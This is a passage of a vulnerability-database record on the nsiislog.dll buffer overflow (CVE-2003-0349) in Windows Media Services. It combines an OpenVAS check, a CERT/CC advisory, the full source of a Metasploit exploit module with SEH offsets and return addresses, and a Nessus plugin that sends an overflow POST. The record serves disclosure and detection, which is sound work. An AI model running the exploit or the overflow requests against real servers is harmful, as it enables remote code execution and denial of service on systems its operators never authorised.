Servers\");\n script_dependencies(\"secpod_ms_iis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to obtain sensitive\n information, execute arbitrary code or cause denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Media Services 4.0 and 4.1\n\n - Microsoft Windows NT 4.0\n\n - Microsoft Windows 2000\");\n\n script_tag(name:\"insight\", value:\"Windows Media Services logging capability for multicast transmissions is\n implemented as ISAPI extension (nsiislog.dll), which fails to processes\n incoming client or malicious HTTP requests.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is running Microsoft Windows Media Services and is prone\n to remote code execution vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nurl = \"/scripts/nsiislog.dll\";\niisreq = http_get(item: url, port: port);\niisres = http_keepalive_send_recv(port:port, data:iisreq, bodyonly:FALSE);\n\nif(!iisres || \">NetShow ISAPI Log Dll\" >!< iisres){\n exit(0);\n}\n\npostData = crap(data: \"A\", length: 70000);\n\nhost = http_host_name(port:port);\n\niisreq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Length: \", strlen(postData),\n \"\\r\\n\\r\\n\", postData);\niisres = http_send_recv(port:port, data:iisreq);\n\nif(iisres && \"HTTP/1.1 500 Server Error\" >< iisres &&\n \"The remote procedure call failed\" >< iisres && \"<title>Error\" >< iisres){\n security_message(port:port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:44:05", "bulletinFamily": "info", "cvelist": ["CVE-2003-0349"], "description": "### Overview \n\nMicrosoft [Windows Media Services](<http://www.microsoft.com/windows/windowsmedia/9series/server.aspx>) provides streaming audio and video capabilities. A vulnerability in a component of this software could allow a remote attacker to compromise the server running it.\n\n### Description \n\nAccording to Microsoft Security Bulletin [MS03-022](<http://microsoft.com/technet/security/bulletin/MS03-022.asp>):\n\nMicrosoft Windows Media Services is a feature of Microsoft Windows 2000 Server, Advanced Server, and Datacenter Server and is also available in a downloadable version for Windows NT 4.0 Server. Windows Media Services contains support for a method of delivering media content to clients across a network known as multicast streaming. In multicast streaming, the server has no connection to or knowledge of the clients that may be receiving the stream of media content coming from the server. To facilitate logging of client information for the server, Windows 2000 includes a capability specifically designed to enable logging for multicast transmissions. \n\nThis logging capability is implemented as an Internet Services Application Programming Interface (ISAPI) extension `nsiislog.dll`. When Windows Media Services are added through add/remove programs to Windows 2000, `nsiislog.dll` is installed in the Internet Information Services (IIS) Scripts directory on the server. Once Windows Media Services is installed, `nsiislog.dll` is automatically loaded and used by IIS. \n \nA buffer overflow flaw exists in the way that `nsiislog.dll` processes incoming client requests. This flaw results in a vulnerability because an attacker could send the server a maliciously crafted HTTP request that could execute code on the vulnerable server or could cause IIS to fail. \n \nThis vulnerability is not believed to immediately affect servers running Windows Media Services as a stand-alone service outside the context of IIS. Since the `nsiislog.dll` file is not available as an ISAPI extension in this environment, an attacker would not be able to supply data to it in a way that exploits the buffer overflow error. The CERT/CC still encourages sites employing this configuration to apply the remediation steps described below in order to mitigate other potential exploitation vectors. \n \n--- \n \n### Impact \n\nA remote attacker may be able to execute arbitrary code in the context of the account under which IIS was running. This access could be leveraged by the attacker to take any action on the system. \n \n--- \n \n### Solution \n\nMicrosoft has released patches for this issue. Users are encouraged to review Microsoft Security Bulletin [MS03-022](<http://microsoft.com/technet/security/bulletin/MS03-022.asp>) for more information. \n \n--- \n \n**Workarounds** \n \nIf `nsiislog.dll` is being used as an ISAPI extension to IIS and its functionality is not required, sites are encouraged to unmap the extension. \n \n--- \n \n### Vendor Information\n\n113716\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: July 15, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft has released patches for this issue. Users are encouraged to review Microsoft Security Bulletin [MS03-022](<http://microsoft.com/technet/security/bulletin/MS03-022.asp>) for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23113716 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/MS03-022.asp>\n * <http://www.microsoft.com/security/security_bulletins/ms03-022.asp>\n * <http://support.microsoft.com/default.aspx?scid=kb;en-us;822343>\n * <http://www.secunia.com/advisories/9115/>\n * <http://securitytracker.com/alerts/2003/Jun/1007059.html>\n\n### Acknowledgements\n\nThis issue was discovered, researched, and reported to Microsoft by Brett Moore of Security-Assessment.com.\n\nThis document was written by Chad R Dougherty.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2003-0349](<http://web.nvd.nist.gov/vuln/detail/CVE-2003-0349>) \n---|--- \n**Severity Metric:** | 19.24 \n**Date Public:** | 2003-06-25 \n**Date First Published:** | 2003-07-31 \n**Date Last Updated: ** | 2003-07-31 13:38 UTC \n**Document Revision: ** | 14 \n", "modified": "2003-07-31T13:38:00", "published": "2003-07-31T00:00:00", "id": "VU:113716", "href": "https://www.kb.cert.org/vuls/id/113716", "type": "cert", "title": "Microsoft Windows Media Services contains buffer overflow in \"nsiislog.dll\"", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-05-23T04:09:41", "description": "This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.\n", "published": "2010-07-25T21:37:54", "type": "metasploit", "title": "MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0349"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/ISAPI/MS03_022_NSIISLOG_POST", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::BruteTargets\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',\n 'Description' => %q{\n This exploits a buffer overflow found in the nsiislog.dll\n ISAPI filter that comes with Windows Media Server. This\n module will also work against the 'patched' MS03-019\n version. This vulnerability was addressed by MS03-022.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2003-0349'],\n [ 'OSVDB', '4535'],\n [ 'BID', '8035'],\n [ 'MSB', 'MS03-022'],\n [ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x2b\\x26\\x3d\\x25\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # SEH offsets by version (Windows 2000)\n # 4.1.0.3917 = 9992\n # 4.1.0.3920 = 9992\n # 4.1.0.3927 = 9992\n # 4.1.0.3931 = 14092\n\n ['Brute Force', { }],\n ['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }],\n ['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],\n ['Windows XP -MS03-019', { 'Rets' => [ 9992, 0x40f011e0 ] }],\n ],\n 'DisclosureDate' => 'Jun 25 2003',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URL', [ true, \"The path to nsiislog.dll\", \"/scripts/nsiislog.dll\" ]),\n ])\n end\n\n def check\n res = send_request_raw({\n 'uri' => normalize_uri(datastore['URL'])\n }, -1)\n\n if (res and res.body =~ /NetShow ISAPI/)\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit_target(target)\n\n # Create a buffer greater than max SEH offset (16384)\n pst = rand_text_alphanumeric(256) * 64\n\n # Create SEH frame and insert into buffer\n seh = generate_seh_payload(target['Rets'][1])\n pst[target['Rets'][0], seh.length] = seh\n\n # Send it to the server\n print_status(\"Sending request...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URL']),\n 'method' => 'POST',\n 'user-agent' => 'NSPlayer/2.0',\n 'content-type' => 'application/x-www-form-urlencoded',\n 'data' => pst\n }, 5)\n\n select(nil,nil,nil,1)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb"}], "nessus": [{"lastseen": "2021-01-01T04:00:37", "description": "Some versions of IIS shipped with a default file, nsiislog.dll,\nwithin the /scripts directory. Nessus has determined that the\nremote host has the file installed.\n\nThe NSIISLOG.dll CGI may allow an attacker to execute\narbitrary commands on this host, through a buffer overflow.", "edition": 24, "published": "2003-05-28T00:00:00", "title": "Microsoft Media Services ISAPI nsiislog.dll Multiple Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0227", "CVE-2003-0349"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "NSIISLOG_DLL.NASL", "href": "https://www.tenable.com/plugins/nessus/11664", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Supercedes MS03-019\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11664);\n script_version(\"1.39\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2003-0227\", \"CVE-2003-0349\");\n script_bugtraq_id(7727, 8035);\n script_xref(name:\"MSFT\", value:\"MS03-022\");\n script_xref(name:\"MSKB\", value:\"822343\");\n\n script_name(english:\"Microsoft Media Services ISAPI nsiislog.dll Multiple Overflows\");\n script_summary(english:\"Determines the presence of nsiislog.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"Some versions of IIS shipped with a default file, nsiislog.dll,\nwithin the /scripts directory. Nessus has determined that the\nremote host has the file installed.\n\nThe NSIISLOG.dll CGI may allow an attacker to execute\narbitrary commands on this host, through a buffer overflow.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-022\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Windows 2000.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\", \"www_fingerprinting_hmap.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nb = get_http_banner(port: port, exit_on_fail: 1);\nif (\"IIS\" >!< b ) exit(0);\n\nw = http_send_recv3(method:\"GET\", item:\"/scripts/nsiislog.dll\", port:port, exit_on_fail: 1);\nres = strcat(w[0], w[1], '\\r\\n', w[2]);\nif(\"NetShow ISAPI Log Dll\" >< res)\n{\n all = make_list(\"date\", \"time\", \"c-dns\", \"cs-uri-stem\", \"c-starttime\",\n \t\t \"x-duration\", \"c-rate\", \"c-status\", \"c-playerid\",\n\t\t \"c-playerversion\", \"c-player-language\", \"cs(User-Agent)\",\n\t\t \"cs(Referer)\", \"c-hostexe\");\n\n poison = NULL;\n\n foreach litem (all)\n {\n poison += litem + \"=Nessus&\";\n }\n\n poison += \"c-ip=\" + crap(65535);\n\n w = http_send_recv3(method:\"POST\", port: port,\n item: \"/scripts/nsiislog.dll\",\n content_type: \"application/x-www-form-urlencoded\",\n add_headers: make_array(\"User-Agent\", \"NSPlayer/2.0\"),\n exit_on_fail: 1, data: poison);\n r = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # 2nd match fails on localized Windows\n if(\"HTTP/1.1 500 Server Error\" >< r && \"The remote procedure call failed. \" >< r ) security_hole(port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}